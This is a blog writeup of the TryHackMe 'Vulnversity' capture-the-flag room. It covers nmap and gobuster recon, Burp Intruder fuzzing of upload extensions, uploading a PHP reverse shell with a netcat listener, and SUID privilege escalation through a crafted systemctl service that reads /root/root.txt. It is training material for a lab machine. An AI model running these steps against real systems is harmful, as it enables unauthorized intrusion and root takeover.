Posts Writeup for TryHackMe room - Vulnversity
Post
Cancel

Writeup for TryHackMe room - Vulnversity

Feb 4 2021-02-04T00:00:00+05:30 by 4n3i5v74
Updated May 13 2021-05-13T23:09:48+05:30 2 min

Vulnversity

This room is about performing recon and web attacks.

For complete tryhackme path, refer the link

Tools Used

Enumeration

  • NMAP
  • Gobuster
  • Burpsuite

Exploitation

Task 2 - Reconnaisance

References

Using nmap as below, all info can be gathered for the task.

nmap -Pn -T4 -sV --reason --open <ip>

Task 3 - Locating directories using Gobuster

References

Using gobuster and dirb wordlists, find the child directories under web root.

gobuster dir -u http://<ip>:3333 -w /usr/share/wordlists/dirb/common.txt -q

Use either curl or browser to load the pages from gobuster result and see if anything contains upload logic.

curl http://<ip>:3333/<dir>/

Task 4 - Compromise the webserver

References

This task can be done using burpsuite.

  • Open firefox and set proxy 127.0.0.1:8080
  • Open burpsuite and turn intercept on
  • Using the url previously found for uploading files, load the url http://<ip>:3333/<dir>/ in firefox and upload a file
  • In burpsuite, in proxy tab, select the content and send to intruder
  • In burpsuite, in intruder tab, and in positions tab, select sniper attack type, clear §, and add § to filename extension
  • In burpsuite, in intruder tab, and in payloads tab, load /usr/share/wordlists/SecLists/Fuzzing/extensions-m1ost-common.fuzz.txt and start attack
  • Check the results for different response size to find which extensions are not blocked
  • Quit burpsuite and reverse proxy setting in firefox

Download the php reverse shell payload,and copy the file under extension .phtml. Edit the file and and change ip to local machine ip.

Start a netcat session to listen for reverse proxy connection.

nc -lnvp 1234

Using the url previously found for uploading files, load the url http://<ip>:3333/<dir>/ in firefox and upload payload file, and navigate to the url http://<ip>:3333/<dir>/uploads/php-reverse-shell.phtml. A reverse shell should have been created in the netcat listening terminal.

The user managing the web server and the flag can be retrieved from the shell.

Task 5 - Privilege Escalation

Now the webserver is compromised and a shell access is gained. This task shows how to gain privilege escalation using SUID.

Find the commands which has SUID set. This allows normal user to gain root access temporarily. Any of the below command can be used to find the binaries allowing SUID.

find / -perm /4000 2>&1 | grep -v “Permission denied”

find / -user root -perm -4000 -exec ls -ldb {} \;

Since the binary found is /bin/systemctl, create a temporary service file, and run it, to gain SUID access.

eop=$(mktemp).service

echo '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $eop

/bin/systemctl link $eop

/bin/systemctl enable --now $eop

Capture the flag from the manipulated output file.

cat /tmp/output
CTF, TryHackMe
tryhackme writeup ctf web
Contents

Writeup for TryHackMe room - OHSINT

Writeup for TryHackMe room - LFI Basics

© 2021 4n3i5v74. Some rights reserved.